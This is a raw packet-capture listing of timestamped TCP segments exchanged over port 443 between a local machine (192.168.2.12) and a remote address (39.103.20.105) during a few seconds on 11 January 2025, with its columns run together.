                                    Jan 11, 2025 04:37:56.975996971 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.976052999 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.980024099 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.980079889 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.980093956 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.980144024 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.982834101 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.982887030 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.982924938 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.982970953 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.985641003 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.985696077 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.985810995 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.985862970 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.988595963 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.988678932 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.988708973 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.988779068 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.990545988 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.990606070 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.990645885 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.990700006 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.993715048 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.993779898 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.993832111 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.993894100 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.993894100 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.997989893 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.998076916 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:56.998141050 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:56.998197079 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.000385046 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.000473022 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.000526905 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.000600100 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.002408028 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.002485991 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.002516031 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.002571106 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.002903938 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.003026009 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.003103018 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.003196955 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.003261089 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.005681038 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.005744934 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.005861044 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.005934000 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.057821035 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.057908058 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.057931900 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.057964087 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.057993889 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.058021069 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.060228109 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.060286999 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.060327053 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.060385942 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.061971903 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.062040091 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.062597990 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.062670946 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.065659046 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.065757036 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.065769911 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.065802097 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.065825939 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.065931082 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.066773891 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.066833973 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.066879034 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.066941023 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.070894003 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.071022034 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.071052074 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.071136951 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.074006081 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.074089050 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.074110985 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.074161053 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.076699018 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.076772928 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.076909065 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.076955080 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.079174995 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.079231977 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.079286098 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.079322100 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.081084967 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.081142902 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.081202984 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.081250906 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.084281921 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.084333897 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.084431887 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.084470034 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.088757038 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.088797092 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.088851929 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.088865995 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.088920116 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.091150999 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.091213942 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.091245890 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.091295958 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.092962980 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.093053102 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.093113899 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.093158007 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.093823910 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.093868971 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.093878031 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.093890905 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.093904972 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.093938112 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.095873117 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.095927000 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.095932007 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.095956087 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.095978975 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.095997095 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.148561001 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.148644924 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.148657084 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.148688078 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.148711920 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.148730993 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.151079893 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.151148081 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.151166916 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.151190996 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.151216984 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.151236057 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.152915001 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.152972937 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.153001070 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.153063059 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.156187057 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.156250954 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.156306028 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.156363964 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.157221079 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.157279015 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.157397985 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.157459021 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.161545038 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.161603928 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.161628962 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.161700010 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.164366007 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.164427996 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.164469004 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.164520025 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.167350054 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.167418003 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.167454958 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.167531013 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.169913054 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.169982910 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.169995070 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.170020103 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.170037031 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.170712948 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.171960115 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.172045946 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.172065973 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.172116995 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.175132990 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.175211906 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.175225019 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.175250053 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.175271034 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.175340891 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.179420948 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.179497004 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.179531097 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.179610014 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.181879997 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.181998968 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.182034969 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.182117939 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.183783054 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.183857918 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.183912992 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.183974981 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.391336918 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.392057896 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.823337078 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.825093031 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.893668890 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.893711090 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.893726110 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.893791914 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.893798113 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.893809080 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.893887043 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.893892050 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.893906116 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.893918037 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.893985987 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.893992901 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.894006014 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.894020081 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.894026041 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.894033909 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.894135952 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.894145966 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:57.894176960 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:57.894249916 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:58.103333950 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:58.105088949 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:58.527371883 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:58.527554989 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.255083084 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.255114079 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.255130053 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.255191088 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.255198002 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.255211115 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.255223036 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.255259037 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.255263090 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.255300999 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.255341053 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.255348921 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.255374908 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.255386114 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.255481005 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.255492926 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.255503893 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.255522013 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.255554914 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.255673885 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.255712032 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.416701078 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.416738987 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.416758060 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.416796923 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.416815996 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.416891098 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.416986942 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.417006969 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.417033911 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.417093039 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.417177916 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.605308056 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.605340958 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.605361938 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.605417013 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.608778000 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.608798027 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.608844042 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.608865976 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.609018087 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.609028101 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.609035969 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.609117985 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.609215021 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.813738108 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.813770056 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.813786983 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.813828945 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.843302011 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.843334913 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.843375921 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.843400002 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.843417883 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.843543053 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.843650103 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.843657017 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:37:59.843713999 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:37:59.843764067 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.055331945 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.055387020 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.071623087 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.071630955 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.071641922 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.071666956 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.071692944 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.105652094 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.105681896 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.105709076 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.105724096 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.105851889 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.105860949 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.105869055 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.105895042 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.105931044 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.105938911 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.106024981 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.106084108 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.315330982 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.315395117 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.375969887 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.376007080 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.376095057 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.416902065 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.416938066 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.416974068 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.416977882 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.417124033 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.417135000 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.417146921 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.417162895 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.417182922 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.417217016 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.417330027 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.417378902 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.623348951 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.623461962 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.710315943 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.710376024 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.710481882 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.752135038 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.752161026 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.752182961 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.752196074 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.752341986 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.752352953 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.752365112 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.752388954 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.752405882 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.752441883 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.752556086 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.752590895 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:00.963340998 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:00.963387966 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:01.052438021 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:01.052489042 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:01.052571058 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:01.094208956 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:01.094280005 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:01.094355106 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:01.094451904 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:01.094490051 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:01.094511032 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:01.094533920 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:01.094588041 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:01.094602108 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:01.094621897 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:01.094656944 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:01.094698906 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:01.094715118 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:01.094819069 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:01.303342104 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:01.303419113 CET49722443192.168.2.1239.103.20.105
                                    Jan 11, 2025 04:38:01.727365971 CET4434972239.103.20.105192.168.2.12
                                    Jan 11, 2025 04:38:01.727515936 CET49722443192.168.2.1239.103.20.105
